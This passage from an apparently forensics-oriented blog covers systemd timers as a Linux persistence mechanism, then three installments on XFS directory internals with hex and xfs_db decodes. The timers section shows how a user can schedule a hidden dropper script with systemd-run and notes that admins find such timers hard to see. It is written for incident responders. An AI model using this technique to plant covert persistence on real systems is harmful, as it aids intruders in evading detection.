Sun 2024-05-05 18:33:46 UTC 34min left    Sun 2024-05-05 17:30:29 UTC 28min ago          anacron.timer                               anacron.service
Sun 2024-05-05 19:50:01 UTC 1h 51min left Sun 2024-05-05 16:37:36 UTC 1h 21min ago       apt-daily.timer                             apt-daily.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       exim4-base.timer                            exim4-base.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       logrotate.timer                             logrotate.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       man-db.timer                                man-db.service
Mon 2024-05-06 00:17:20 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       fwupd-refresh.timer                         fwupd-refresh.service
Mon 2024-05-06 01:13:52 UTC 7h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       fstrim.timer                                fstrim.service
Mon 2024-05-06 03:23:47 UTC 9h left       Fri 2024-04-19 00:59:27 UTC 2 weeks 2 days ago systemd-tmpfiles-clean.timer                systemd-tmpfiles-clean.service
Mon 2024-05-06 06:02:06 UTC 12h left      Sun 2024-05-05 16:37:36 UTC 1h 21min ago       apt-daily-upgrade.timer                     apt-daily-upgrade.service
Sun 2024-05-12 03:10:20 UTC 6 days left   Sun 2024-05-05 16:37:36 UTC 1h 21min ago       e2scrub_all.timer                           e2scrub_all.service

11 timers listed.
# systemctl status run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
● run-rb68ce3d3c11a4ec79b508036776d2cb1.timer - /tmp/.evil-lair/myStartUp.sh
     Loaded: loaded (/run/systemd/transient/run-rb68ce3d3c11a4ec79b508036776d2cb1.timer; transient)
  Transient: yes
     Active: active (waiting) since Sun 2024-05-05 17:48:25 UTC; 10min ago
    Trigger: Sun 2024-05-05 17:59:15 UTC; 3s left
   Triggers: ● run-rb68ce3d3c11a4ec79b508036776d2cb1.service

May 05 17:48:25 LAB systemd[1]: Started /tmp/.evil-lair/myStartUp.sh.

Note that these timers are transient because the /var/run directory is an in-memory file system. These timers, like the file system itself, will disappear on system shutdown or reboot.
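
For responders, that means grabbing copies of the transient unit files before a reboot (or before stopping the units) destroys them. A minimal sketch, assuming /root/evidence is wherever you are staging collected artifacts:

mkdir -p /root/evidence
cp -a /run/systemd/transient /root/evidence/run-systemd-transient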

Per-User Timers

Systemd also allows unprivileged users to create timers. The command line interface we’ve seen so far stays essentially the same except that regular users must add the --user flag to all commands. User *.timer and *.service files must be placed in $HOME/.config/systemd/user. Or the user could create a transient timer without explicit *.timer and *.service files:

$ systemd-run --user --on-calendar='*-*-* *:*:30' /tmp/.dropper/.src.sh
Running timer as unit: run-rdad04b63554a4ebeb12bc5ca42baaa31.timer
Will run service as unit: run-rdad04b63554a4ebeb12bc5ca42baaa31.service

The user can use systemctl list-timers and systemctl status to check on their timers:

$ systemctl list-timers --user --all
NEXT                        LEFT     LAST PASSED UNIT                                        ACTIVATES
Sun 2024-05-05 18:20:30 UTC 40s left n/a  n/a    run-rdad04b63554a4ebeb12bc5ca42baaa31.timer run-rdad04b63554a4ebeb12bc5ca42baaa31.service

1 timers listed.
$ systemctl status --user run-rdad04b63554a4ebeb12bc5ca42baaa31.timer
● run-rdad04b63554a4ebeb12bc5ca42baaa31.timer - /tmp/.dropper/.src.sh
     Loaded: loaded (/run/user/1000/systemd/transient/run-rdad04b63554a4ebeb12bc5ca42baaa31.timer; transient)
  Transient: yes
     Active: active (waiting) since Sun 2024-05-05 18:19:35 UTC; 32s ago
    Trigger: Sun 2024-05-05 18:20:30 UTC; 22s left
   Triggers: ● run-rdad04b63554a4ebeb12bc5ca42baaa31.service

May 05 18:19:35 LAB systemd[1293]: Started /tmp/.dropper/.src.sh.

As you can see in the above output, transient per-user run-*.timer and run-*.service files end up under [/var]/run/user/<UID>/systemd/transient.

Unfortunately, there does not seem to be a way for the administrator to conveniently query timers for regular users on the system. You’re left with consulting the system logs and grabbing whatever on-disk artifacts you can, like the user’s $HOME/.config/systemd directory.
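
Since we are reduced to on-disk artifacts, a rough collection loop over the usual per-user locations might look like the sketch below (run as root; the /home glob is an assumption about where home directories live on your systems):

for d in /run/user/*/systemd/transient /home/*/.config/systemd/user /root/.config/systemd/user; do
    [ -d "$d" ] || continue
    echo "=== $d ==="
    find "$d" \( -name '*.timer' -o -name '*.service' \) -ls
done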

XFS (Part 6) – B+Tree Directories

Look here for earlier posts in this series.

Just to see what would happen, I created a directory containing 5000 files. Let’s start with the inode:

B+Tree Directory

The number of extents (bytes 76-79) is 0x2A, or 42. This is too many extents to fit in an extent array in the inode. The data fork type (byte 5) is 3, which means the data fork is the root of a B+Tree.

The root of the B+Tree starts at byte offset 176 (0x0B0), right after the inode core. The first two bytes are the level of this node in the tree. The value 1 indicates that this is an interior node in the tree, rather than a leaf node. The next two bytes are the number of entries in the arrays which track the nodes below us in the tree– there is only one node and one array entry. Four padding bytes are used to maintain 64-bit alignment.

The rest of the space in the data fork is divided into two arrays for tracking sub-nodes. The first array is made up of four byte logical offset values, tracking where each chunk of file data belongs. The second array holds the absolute block addresses of the nodes that track the extents at the corresponding logical offsets. In our case that block is 0x8118e4 = 8460516 (aka relative block 71908 in AG 2), which tracks the extents starting from the start of the file (logical offset zero).
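
The split between the AG number and the AG-relative block comes from the superblock’s agblklog value (the number of bits reserved for AG-relative block numbers). Assuming agblklog is 22 and 2427136 blocks per AG for this file system (consistent with the numbers used elsewhere in this series), the conversion works out like this:

fsblock=$((0x8118e4))                      # pointer value from the B+Tree root
ag=$(( fsblock >> 22 ))                    # AG number (assumes sb_agblklog = 22)
rel=$(( fsblock & ((1 << 22) - 1) ))       # block number relative to that AG
phys=$(( ag * 2427136 + rel ))             # linear block number (2427136 blocks per AG)
echo "AG=$ag rel=$rel phys=$phys sector=$(( phys * 8 ))"
# AG=2 rel=71908 phys=4926180 sector=39409440 (matches the sector offset in the block header below)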

This is a small file system and the absolute block addresses fit in 32 bits. What’s not clear from the documentation is what happens when the file system is large enough to require 64-bit block addresses. More research is needed here.

Let’s examine block 8460516 which holds the extent information. Here are the first 256 bytes in a hex editor:

B+Tree Directory Leaf

0-3     Magic number                        BMA3
4-5     Level in tree                       0 (leaf node)
6-7     Number of extents                   42
8-15    Left sibling pointer                -1 (NULL)

16-23   Right sibling pointer               -1 (NULL)
24-31   Sector offset of this block         0x02595720 = 39409440

32-39   LSN of last update                  0x200000631b
40-55   UUID                                e56c...da71
56-63   Inode owner of this block           0x022f4d7d = 36654461

64-67   CRC32 of this block                 0x9d14d936
68-71   Padding for 64-bit alignment        zeroed

This node is at level zero in the tree, which means it’s a leaf node containing data. In this case the data is extent structures, and there are 42 of them following the header.

If there were more than one leaf node, the left and right sibling pointers would be used. Since we only have the one leaf, both of these values are set to -1, which is used as a NULL pointer in XFS metadata structures.

When it comes to decoding the extent structures, it’s easier to use xfs_db:

xfs_db> inode 36654461
xfs_db> addr u3.bmbt.ptrs[1]
xfs_db> print
magic = 0x424d4133
level = 0
numrecs = 42
leftsib = null
rightsib = null
bno = 39409440
lsn = 0x200000631b
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
owner = 36654461
crc = 0x9d14d936 (correct)
recs[1-42] = [startoff,startblock,blockcount,extentflag] 
1:[0,4581802,1,0] 
2:[1,4581800,1,0] 
3:[2,4581799,1,0] 
4:[3,4581798,1,0] 
5:[4,4581794,1,0] 
6:[5,4581793,1,0] 
7:[6,4581791,1,0] 
8:[7,4581790,1,0] 
9:[8,4581789,1,0] 
10:[9,4581787,1,0] 
11:[10,4581786,1,0] 
12:[11,4582219,1,0] 
13:[12,4582236,1,0] 
14:[13,4587210,1,0] 
15:[14,4688117,3,0] 
16:[17,4695931,1,0] 
17:[18,4695948,1,0] 
18:[19,4701245,1,0] 
19:[20,4703737,1,0] 
20:[21,4706394,1,0] 
21:[22,4711526,1,0] 
22:[23,4714191,1,0] 
23:[24,4721971,1,0] 
24:[25,4729743,1,0] 
25:[26,4740155,1,0] 
26:[27,4742820,1,0] 
27:[28,4745312,1,0] 
28:[29,4747961,1,0] 
29:[30,4753101,1,0] 
30:[31,4761038,1,0] 
31:[32,4768818,1,0] 
32:[33,4776747,1,0] 
33:[34,4797727,1,0] 
34:[8388608,4581801,1,0] 
35:[8388609,4581796,1,0] 
36:[8388610,4581795,1,0] 
37:[8388611,4581792,1,0] 
38:[8388612,4581788,1,0] 
39:[8388613,8459337,1,0] 
40:[8388614,8460517,2,0] 
41:[8388616,8682827,7,0] 
42:[16777216,4581797,1,0]

As we saw in the previous installment, multi-block directories in XFS are sparse files:

  • Starting at logical offset zero, we have extents 1-33 containing the first 35 blocks of the directory file. This is where the directory entries live.
  • Extents 34-41 starting at logical offset 8388608 (XFS_DIR2_LEAF_OFFSET) contain the hash lookup table for finding directory entries.
  • Because the hash lookup table is large enough to require multiple blocks, the “tail record” for the directory moves into its own block tracked by the final extent (extent 42 in our example above). The logical offset for the tail record is 2*XFS_DIR2_LEAF_OFFSET or 16777216 (see the quick arithmetic below).
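
Both of these magic logical offsets fall straight out of XFS_DIR2_LEAF_OFFSET (32GB) and the 4K block size:

echo $(( 32 * 1024 * 1024 * 1024 / 4096 ))        # XFS_DIR2_LEAF_OFFSET in blocks: 8388608
echo $(( 2 * 32 * 1024 * 1024 * 1024 / 4096 ))    # start of the tail record area: 16777216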

The Tail Record

0-3      Magic number                       XDF3
4-7      CRC32 checksum                     0xf56e9aba
8-15     Sector offset of this block        22517032

16-23    Last LSN update                    0x200000631b
24-39    UUID                               e56c...da71
40-47    Inode that points to this block    0x022f4d7d

48-51    Starting block offset              0
52-55    Size of array                      35
56-59    Array entries used                 35
60-63    Padding for 64-bit alignment       zeroed

The last two fields describe an array whose elements correspond to the blocks in the hash lookup table for this directory. The array itself follows immediately after the header as shown above. Each element of the array is a two-byte number representing the largest chunk of free space available in each block. In our example, all of the blocks are full (zero free bytes) except for the last block which has at least a 0x0440 = 1088 byte chunk available.

Decoding the Hash Lookup Table

The hash lookup table for this directory is contained in the fifteen blocks starting at logical block offset 8388608. Because the hash lookup table spans multiple blocks, it is also formatted as a B+Tree. The initial block at logical offset 8388608 should be the root of this tree. This block is shown below.

0-3      "Forward" pointer                  0
4-7      "Back" pointer                     0
8-9      Magic number                       0x3ebe
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0x129cf461

16-23    Sector offset of this block        22517064
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            14
58-59    Level in tree                      1
60-63    Padding for alignment              zeroed

We confirm this is an interior node of a B+Tree by looking at the “Level in tree” value at bytes 58-59– interior nodes have non-zero values here. The “forward” and “back” pointers being zeroed means there are no other nodes at this level, so we’re sitting at the root of the tree.

The fourteen other blocks that hold the hash lookup records are tracked by an array here in the root block. Bytes 56-57 track the size of the array, and the array itself starts at byte 64. Each array entry contains a four byte hash value and a four byte logical block offset. The hash value in each array entry is the largest hash value in the given block.

It’s easier to decode these values using xfs_db:

xfs_db> fsblock 4581801
xfs_db> type dir3
xfs_db> p
nhdr.info.hdr.forw = 0
nhdr.info.hdr.back = 0
nhdr.info.hdr.magic = 0x3ebe
nhdr.info.crc = 0x129cf461 (correct)
nhdr.info.bno = 22517064
nhdr.info.lsn = 0x200000631b
nhdr.info.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
nhdr.info.owner = 36654461
nhdr.count = 14
nhdr.level = 1
nbtree[0-13] = [hashval,before]
0:[0x4863b0b3,8388610]
1:[0x4a63d132,8388619]
2:[0x4c63d1f3,8388615]
3:[0x4e63f070,8388622]
4:[0x9c46fd6d,8388612]
5:[0xa446fd6d,8388621]
6:[0xac46fd6d,8388618]
7:[0xb446fd6d,8388616]
8:[0xbc275ded,8388614]
9:[0xbc777c6d,8388609]
10:[0xc463d170,8388611]
11:[0xc863f170,8388620]
12:[0xcc63d072,8388613]
13:[0xce63f377,8388617]

If you look at the residual data in the block after the hash array, it looks like hash values and block offsets similar to what we’ve seen in previous installments. I speculate that this is residual data from when the hash lookup table was able to fit into a single block. Once the directory grew to a point where the B+Tree was necessary, the new B+Tree root node simply took over this block, leaving a significant amount of residual data in the slack space.

To understand the function of the leaf nodes in the B+Tree, suppose we wanted to find the directory entry for the file “0003_smallfile”. First we can use xfs_db to compute the hash value for this filename:

xfs_db> hash 0003_smallfile
0xbc07fded

According to the array, that hash value should be in logical block 8388614. We then have to refer back to the list of extents we decoded earlier to discover that this logical offset corresponds to block address 8460517 (AG 2, block 71909). Here is the breakdown of that block:

0-3      Forward pointer                    0x800001 = 8388609
4-7      Back pointer                       0x800008 = 8388616
8-9      Magic number                       0x3dff
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0xdb227061

16-23    Sector offset of this block        39409448
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            0x01a0 = 416
58-59    Unused entries                     0
60-63    Padding for alignment              zeroed

Following the 64-byte header is an array holding the hash lookup structures. Each structure contains a four byte hash value and a four byte offset. The array is sorted by hash value for binary search. Offsets are in 8 byte units.
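
If you want to pull this block into a hex editor yourself, a dd one-liner does the trick. The device name is an assumption about my lab system; the block arithmetic uses the blocks-per-AG figure from Part 1 of this series (AG 2, relative block 71909):

dd if=/dev/sdb1 bs=4096 skip=$(( 2 * 2427136 + 71909 )) count=1 of=hash_leaf.bin
xxd hash_leaf.bin | head -8    # the 0x3dff magic number should appear at byte offset 8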

The hash value for “0003_smallfile” was 0xbc07fded. We have to look fairly far down in the array to find the offset for this value:

The offset value of 0x13 = 19 tells us that the directory entry for “0003_smallfile” should be 19 * 8 = 152 bytes from the start of the directory file (remember that offsets are in 8-byte units). That puts it near the beginning of the first block at logical offset zero.

The Directory Entries

To find the first block of the directory file we need to refer back to the extent list we decoded from the inode at the very start of this article. According to that list, the initial block is 4581802 (AG 1, block 387498). Let’s take a closer look at this block:

0-3      Magic number                       XDD3
4-7      CRC32 checksum                     0xaf173b31
8-15     Sector offset to this block        22517072

16-23    LSN of last update                 0x200000631b
24-39    UUID                               e56c...da71
40-47    Parent inode                       0x022f4d7d

Bytes 48-59 are a three element array indicating where there is available free space in this directory. Each array element is a 2 byte offset (in bytes) to the free space and a 2 byte length (in bytes). There is no free space in this block, so all array entries are zeroed. Bytes 60-63 are padding for alignment.

Following this header are variable length directory entries defined as follows:

     Len (bytes)     Field
     ===========     ======
       8             absolute inode number
       1             file name length (bytes)
       varies        file name
       1             file type
       varies        padding as necessary for 64bit alignment
       2             offset to beginning of this entry

Here is the decoding of the directory entries shown above:

    Inode        Len    File Name         Type    Offset
    =====        ===    =========         ====    ========
    0x022f4d7d    1     .                 2       0x0040
    0x04159fa1    2     ..                2       0x0050
    0x022f4d7e   14     0001_smallfile    1       0x0060
    0x022f4d7f   12     0002_bigfile      1       0x0080
    0x022f4d80   14     0003_smallfile    1       0x0098
    0x022f4d81   12     0004_bigfile      1       0x00B8

File type bytes are as described in Part Three of this series (1 is a regular file, 2 is a directory). Note that the starting offset of the “0003_smallfile” entry is 152 bytes (0x0098), exactly as the hash table lookup told us.
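
As a spot check, you can pull that first data block with dd and look at offset 0x98 directly. Again the device name is an assumption, and the block arithmetic uses the blocks-per-AG figure from Part 1 (AG 1, relative block 387498):

dd if=/dev/sdb1 bs=4096 skip=$(( 1 * 2427136 + 387498 )) count=1 of=dir_block.bin
od -A x -t x1 -j 0x98 -N 32 dir_block.bin
# Expect the 8-byte inode number 0x022f4d80, the name length 0x0e (14),
# the name "0003_smallfile", the file type 0x01, and the 2-byte tag 0x0098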

What Happens Upon Deletion?

Let’s see what happens when we delete “0003_smallfile”. When doing this sort of testing, always be careful to force the file system cache to flush to disk before busting out the trusty hex editor:

# rm -f /root/dir-testing/bigdir/0003_smallfile
# sync; echo 3 > /proc/sys/vm/drop_caches

The mtime and ctime in the directory inode are set to the deletion time of “0003_smallfile”. The LSN and CRC32 checksum in the inode are also updated.

The removal of a single file is typically not a big enough event to modify the size of the directory. In this case, neither the extent tree root nor the leaf block changes. We would have to purge a significant number of files to impact this data.

However, the “tail record” for the directory is impacted by the file deletion.

The CRC32 checksum and LSN (now highlighted in red) are updated. Also the free space array now shows 0x20 = 32 bytes free in the first block.

Again, a single file deletion is not significant enough to impact the root of the hash B+Tree. However, one of the leaf nodes does register the change.

Again we see updates to the CRC32 checksum and LSN fields. The “Unused entries” field for the hash array now shows one unused entry. Looking farther down in the block, we find the unused entry for our hash 0xbc07fded. The offset is zeroed to indicate this entry is unused. We saw similar behavior in other block-based directories in previous installments of this series.

Changes to the directory entries are also similar to the behavior we’ve seen previously for block-based directory files:

Again we see the usual CRC32 and LSN updates. But now the free space array starting at byte 48 shows 0x0020 = 32 bytes free at offset 0x0098 = 152. The first two bytes of the inode field in this directory entry are overwritten with 0xFFFF to indicate the unused space, and the next two bytes indicate 0x0020 = 32 bytes of free space. However, since the inodes in this file system fit in 32 bits, the original inode number for the file is still fully visible, and the file could potentially be recovered using residual data in the inode.

Wrapping Up and Planning for the Future

This post concludes my walk-through of the major on-disk data structures in the XFS file system. If anything was unclear or you want more detailed explanations in any area, feel free to reach me through the comments or via any of my social media accounts.

The colorized hex dumps that appear in these posts were made with a combination of Synalyze It! and Hexinator. Along the way I created “grammar” files that you can use to produce similar colored breakdowns of your own XFS data structures.

I have multiple pages of research questions that came up as I was working through this series. But what I’m most interested in at the moment is the process of recovering deleted data from XFS file systems. This is what I will be looking at in upcoming posts.

XFS (Part 5) – Multi-Block Directories

Life gets more interesting when directories get large enough to occupy multiple blocks. Let’s take a look at my /etc directory:

[root@localhost hal]# ls -lid /etc
67146849 drwxr-xr-x. 141 root root 8192 May 26 20:37 /etc

The file size is 8192 bytes, or two 4K blocks.

Now we’ll use xfs_db to get more information:

xfs_db> inode 67146849
xfs_db> print
[...]
core.size = 8192
core.nblocks = 3
core.extsize = 0
core.nextents = 3
[...]
u3.bmx[0-2] = [startoff,startblock,blockcount,extentflag] 
0:[0,8393423,1,0] 
1:[1,8397532,1,0] 
2:[8388608,8394766,1,0]
[...]

I’ve removed much of the output here to make things more readable. The directory file is fragmented, requiring multiple single-block extents, which is common for directories in XFS. A directory starts out as a single block. Eventually enough files are added that the directory needs more than one block to hold all of the entries. But by that time, the blocks immediately following the original directory block have usually been consumed– often by the files that make up the content of the directory. So when the directory needs to grow, it typically has to fragment.

What is really interesting about multi-block directories in XFS is that they are sparse files. Looking at the list of extents at the end of the xfs_db output, we see that the first two blocks are at logical block offsets 0 and 1, but the third block is at logical block offset 8388608. What the heck is going on here?

If you recall from our discussion of block directories in the last installment, XFS directories have a hash lookup table at the end for faster searching. When a directory consumes multiple blocks, the hash lookup table and “tail record” move into their own block. For consistency, XFS places this information at logical offset XFS_DIR2_LEAF_OFFSET, which is currently set to 32GB. 32GB divided by our 4K block size gives a logical block offset of 8388608.

From a file size perspective, we can see that xfs_db agrees with our earlier ls output, saying the directory is 8192 bytes. However, the xfs_db output clearly shows that the directory consumes three blocks, which should give it a file size of 3*4096 = 12288 bytes. Based on my testing, the directory “size” in XFS only counts the blocks that contain directory entries.
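
You can see the same mismatch from userspace with GNU stat: the reported size covers only the blocks holding directory entries, while the allocated block count covers all three blocks:

stat -c 'size=%s bytes  allocated=%b x %B-byte blocks' /etc
# size=8192 bytes  allocated=24 x 512-byte blocks (24 * 512 bytes = 3 file system blocks)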

We can use xfs_db to examine the directory data blocks in more detail:

xfs_db> addr u3.bmx[0].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xe3a7892d (correct)
dhdr.hdr.bno = 38872696
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0x220
dhdr.bestfree[0].length = 0x8
dhdr.bestfree[1].offset = 0x258
dhdr.bestfree[1].length = 0x8
dhdr.bestfree[2].offset = 0x368
dhdr.bestfree[2].length = 0x8
du[0].inumber = 67146849
du[0].namelen = 1
du[0].name = "."
du[0].filetype = 2
du[0].tag = 0x40
du[1].inumber = 64
du[1].namelen = 2
du[1].name = ".."
du[1].filetype = 2
du[1].tag = 0x50
du[2].inumber = 34100330
du[2].namelen = 5
du[2].name = "fstab"
du[2].filetype = 1
du[2].tag = 0x60
du[3].inumber = 67146851
du[3].namelen = 8
du[3].name = "crypttab"
[...]

I’m using the addr command in xfs_db to select the startblock value from the first extent in the array (the zero element of the array).

The beginning of this first data block is nearly identical to the block directories we looked at previously. The only difference is that single block directories have a magic number “XDB3”, while data blocks in multi-block directories use “XDD3” as we see here. Remember that the value that xfs_db labels dhdr.hdr.bno is actually the sector offset to this block and not the block number.

Let’s look at the next data block:

xfs_db> inode 67146849
xfs_db> addr u3.bmx[1].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xa0dba9dc (correct)
dhdr.hdr.bno = 38905568
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0xad8
dhdr.bestfree[0].length = 0x20
dhdr.bestfree[1].offset = 0xc18
dhdr.bestfree[1].length = 0x20
dhdr.bestfree[2].offset = 0xd78
dhdr.bestfree[2].length = 0x20
du[0].inumber = 67637117
du[0].namelen = 10
du[0].name = "machine-id"
du[0].filetype = 1
du[0].tag = 0x40
du[1].inumber = 67146855
du[1].namelen = 9
du[1].name = "localtime"
[...]

Again we see the same header information. Note that each data block has its own “free space” array, tracking available space in that data block.

Finally, we have the block containing the hash lookup table and tail record. We could use xfs_db to decode this block, but it turns out that there are some interesting internal structures to see here. Here’s the hex editor view of the start of the block:

Extent Directory Tail Block:

0-3     Forward link                        0
4-7     Backward link                       0
8-9     Magic number                        0x3df1
10-11   Padding                             zeroed
12-15   CRC32                               0xef654461

16-23   Sector offset                       38883440
24-31   Log seq number last update          0x2200008720
32-47   UUID                                e56c3b41-...-dd609cb7da71
48-55   Inode number                        67146849

56-57   Number of entries                   0x0126 = 294
58-59   Unused entries                      1
60-63   Padding for alignment               zeroed

The “forward” and “backward” links would come into play if this were a multi-node B+Tree data structure rather than a single block. Unlike previous magic number values, the magic value here (0x3df1) does not correspond to printable ASCII characters.

After the typical XFS header information, there is a two-byte value tracking the number of entries in the directory, and therefore the number of entries in the hash lookup table that follows. The next two bytes tell us that there is one unused entry– typically a record for a deleted file.

We find this unused record near the end of the hash lookup array. The entry starting at block offset 0x840 has an offset value of zero, indicating the entry is unused:

Extent Directory Tail block 0x820

Interestingly, right after the end of the hash lookup array, we see what appears to be the extended attribute information from an inode. This is apparently residual data left over from an earlier use of the block.

At the end of the block is data which tracks free space in the directory:

Extent Directory Tail Block 0xFFF

The last four bytes in the block are the number of blocks containing directory entries– two in this case. Preceding those four bytes is a “best free” array that tracks the length of the largest chunk of free space in each block. You will notice that the array values here correspond to the dhdr.bestfree[0].length values for each block in the xfs_db output above. When new directory entries are added, this array helps the file system locate the best spot to place the new entry.

We see the two bytes immediately before the “best free” array are identical to the first entry in the array. Did the /etc directory once consume three blocks and later shrink back to two? Based on limited testing, this appears to be the case. Unlike directories in traditional Unix file systems, which never shrink once blocks have been allocated, XFS directories will grow and shrink dynamically as needed.

So far we’ve looked at the three most common directory types in XFS: small “short form” directories stored in the inode, single block directories, and multi-block directories tracked with an extent array in the inode. In rare cases, when the directory is very large and very fragmented, the extent array in the inode is insufficient and XFS uses a B+Tree to track the extent information. We will examine this scenario in the next installment.


XFS (Part 4) – Block Directories

In the previous installment, we looked at small directories stored in “short form” in the inode. While these small directories can make up as much as 90% of the total directories in a typical Linux file system, eventually directories get big enough that they can no longer be packed into the inode data fork. When this happens, directory data moves out to blocks on disk.

In the inode, the data fork type (byte 5) changes to indicate that the data is no longer stored within the inode. Extents are used to track the location of the disk blocks containing the directory data. Here is the inode core and extent list for a directory that only occupies a single block:

Inode detail for directory occupying a single block

The data fork type is 2, indicating an extent list follows the inode core. Bytes 76-79 indicate that there is only a single extent. The extent starts at byte 176 (0x0B0), immediately after the inode core. The last 21 bits of the extent structure show that the extent only contains a single block. Parsing the rest of the extent yields a block address of  0x8118e7, or relative block 71911 in AG 2.

We can extract this block and examine it in our hex editor. Here is the data in the beginning of the block:

Block Directory Header and Entries

The directory block begins with a 48 byte header:

0-3      Magic number                       XDB3
4-7      CRC32 checksum                     0xaf6a416d
8-15     Sector offset of this block        39409464

16-23    Last LSN update                    0x20000061fe
24-39    UUID                               e56c3b41-...-dd609cb7da71
40-47    inode that points to this block    0x0408e66d

You may compare the UUID and inode values in the directory block header with the corresponding values in the inode to see that they match.

The XFS documentation describes the sector offset field as the “block number”. However, using the formula from Part 1 of this series, we can calculate the physical block number of this block as:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         71911   =   4926183

Multiply the block offset 4926183 by 8 sectors per block to get the sector offset value 39409464 that we see in the directory block header.

Following the header is a “free space” array that consumes 12 bytes, plus 4 bytes of padding to preserve 64-bit alignment. The free space array contains three elements which indicate where the three largest chunks of unused space are located in this directory block. Each element is a 2 byte offset and a 2 byte length field. The elements of the array are sorted in descending order by the length of each chunk.

In this directory block, there is only a single chunk of free space, starting at offset 1296 (0x0510) and having 2376 bytes (0x0948) of space. The other elements of the free space array are zeroed, indicating no other free space is available.

The directory entries start at byte 64 (0x040) and can be read sequentially like a typical Unix directory. However, XFS uses a hash-based lookup table, growing up from the bottom of the directory block, for more efficient searching:

Block Directory Tail Record and Hash Array

The last 8 bytes of the directory block are a “tail record” containing two 4 byte values: the number of directory entries (0x34 or 52) and the number of unused entries (zero). Immediately preceding the tail record will be an array of 8 byte records, one record per directory entry (52 records in this case). Each record contains a hash value computed from the file name, and the offset in the directory block where the directory entry for that file is located. The array is sorted by hash value so that binary search can quickly find the desired record. The offsets are in 8 byte units.

The xfs_db program can compute hash values for us:

xfs_db> hash 03_smallfile
0x3f07fdec

If we locate this hash value in the array, we see the byte offset value is 0x12 or 18. Since the offset units are 8 bytes, this translates to byte offset 144 (0x090) from the start of the directory block.

Here are the first six directory entries from this block, including the entry for “03_smallfile”:

Directory Entry Detail

Directory entries are variable length, but always 8 byte (64-bit) aligned. The fields in each directory entry are:

     Len (bytes)       Field
     ===========       =====
          8            Inode number
          1            File name length
          varies       File name
          1            File type
          varies       Padding for alignment
          2            Byte offset of this directory entry

64-bit inode addresses are always used. This is different from “short form” directories, where 32-bit inode addresses will be used if possible.

File name length is a single byte, limiting file names to 255 characters. The file type byte uses the same numbering scheme we saw in “short form” directories:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Padding for alignment is only included if necessary. Our “03_smallfile” entry starting at offset 0x090 is exactly 24 bytes long and needs no padding for alignment. You can clearly see the padding in the “.” and “..” entries starting at offset 0x040 and 0x050 respectively.
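
The per-entry length math is easy to check in the shell: everything except the name is fixed overhead (8-byte inode, 1-byte length, 1-byte type, 2-byte tag), and the total rounds up to the next multiple of 8:

namelen=12                             # "03_smallfile"
raw=$(( 8 + 1 + namelen + 1 + 2 ))     # fixed fields plus the name itself
echo $(( (raw + 7) / 8 * 8 ))          # 24 bytes, so no padding needed for this entry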

Deleting a File

If we remove “03_smallfile” from this directory, the inode updates similarly to what we saw with the “short form” directory in the last installment of this series. The mtime and ctime values are updated, as are the CRC32 and Log Sequence Number (LSN) fields. The file size does not change, since the directory still occupies one block.

The “tail record” and hash array at the end of the directory block change:

Tail record and hash array post delete

The tail record still shows 0x34 = 52 entries, but one of them is now unused. If we look at the entry for hash 0x3F07FDEC, we see the offset value has been zeroed, indicating an unused record.

We also see changes at the beginning of the block:

Directory entry detail post delete

The free space array now uses the second element, showing 24 (0x18) bytes free at byte offset 0x90– the location where the “03_smallfile” entry used to reside.

Looking at offset 0x90, we see that the first two bytes of the inode field are overwritten with 0xFFFF, indicating an unused entry. The next two bytes are the length of the free space. Again we see 0x18, or 24 bytes.

However, since inode addresses in this file system fit in 32 bits, the original inode address associated with this file is still clearly visible. The rest of the original directory entry is untouched until a new entry overwrites this space. This should make file recovery easier.

Not Quite Done With Directories

When directories get large enough to occupy multiple blocks, the directory structure gets more complicated. We’ll examine larger directories in our next installment.